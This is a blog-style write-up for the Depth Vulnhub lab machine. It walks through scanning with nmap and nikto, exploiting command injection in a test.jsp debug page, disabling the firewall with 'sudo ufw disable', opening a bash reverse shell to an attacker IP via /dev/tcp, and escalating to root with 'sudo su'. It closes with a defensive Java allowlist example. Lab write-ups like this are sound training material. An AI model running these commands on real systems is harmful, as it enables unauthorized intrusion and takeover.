Depth Vulnhub Writeup

Vignesh
3 min read · Aug 21, 2022


Hi guys, a warm welcome to my blog. Today we are going to discuss the Depth Vulnhub machine. It is a very easy machine that comes with an OS command injection vulnerability on the debugging page, and it runs on a Java server.

To escalate to root privileges we will abuse the sudo binary.

So first, fire up the machine in VirtualBox.

Download the machine: https://www.vulnhub.com/entry/depth-1,213/

As usual, we start with an nmap scan.

STEP 1: nmap -sC -sV 192.168.0.12


Further analyzing this nmap result, I found some interesting services and ports, which are SSH on 22 and HTTP on 8080, etc.

So let us visit the web page at http://192.168.0.12:8080

Here I checked all the links, but nothing was interesting.

So I enumerated further using the nikto tool.

STEP 2: nikto -h http://192.168.0.12:8080


After analyzing this report, I found one interesting file, which is test.jsp

So let's check it at http://192.168.0.12:8080/test.jsp

Further analyzing this web page, I found that it is affected by an OS command injection vulnerability, which lets us run system commands.

So first I tried

STEP 3: ls -l /tmp

This lists the files in the tmp folder.

So next I tried the home directory.

STEP 4: ls -l /home

Now you get the username on that system, which is bill.

So next I disabled the firewall on that machine.

STEP 5: ssh bill@localhost sudo ufw disable

Next, we are going to write the reverse shell.

Before that, set up your listener.

STEP 6: nc -lvp 4242

STEP 7: ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.0.2/4242 0>&1

Booooooooommmmmmm!!!!!

Now you get a user shell on that machine.

To escalate to root privileges, we go for sudo binary abuse.

STEP 8: sudo -l

STEP 9: sudo su

Booooooooommmmmmmmmm!!!!

Now you will get the root shell

STEP 10: cd root

STEP 11: cat flag
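
For defenders, the root cause in test.jsp is a debugging page that hands user-supplied text to the operating system. The following is an added example (not code from the Depth machine or from this writeup) of a debug helper that only runs fixed commands; the class name, the action names and the binary paths are hypothetical.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.Map;

// Added example: hardened replacement for a "run a command" debug page.
public class DebugCommands {
    // Hypothetical action names (paths assume a typical Linux host).
    // Each action maps to a fixed argv; user text is never part of the command.
    private static final Map<String, List<String>> ALLOWED = Map.of(
        "list-tmp", List.of("/bin/ls", "-l", "/tmp"),
        "uptime",   List.of("/usr/bin/uptime"));

    // Runs the fixed command for `action`; rejects anything not in the allowlist.
    static String run(String action) throws IOException, InterruptedException {
        // Map.of() maps throw on a null key, so guard before the lookup.
        List<String> argv = (action == null) ? null : ALLOWED.get(action);
        if (argv == null) {
            throw new IllegalArgumentException("action not allowed");
        }
        // ProcessBuilder with an argv list executes the binary directly, with no
        // shell in between, so ';', '|', '>&' and similar are never interpreted.
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        byte[] out = p.getInputStream().readAllBytes();
        p.waitFor();
        return new String(out, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws Exception {
        // Allowed action: output of the fixed command is returned.
        System.out.print(run("list-tmp"));
        // Constructed inputs: free-form command text is rejected, not executed.
        for (String bad : List.of("ls -l /home", "list-tmp; id")) {
            try {
                run(bad);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + bad);
            }
        }
    }
}
```

It runs as a single file with `java DebugCommands.java` on Java 11 or later. A page like this still belongs behind authentication or removed from production entirely; the allowlist only limits what it can do.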

I hope you understood this article. If you liked it, please donate to us.
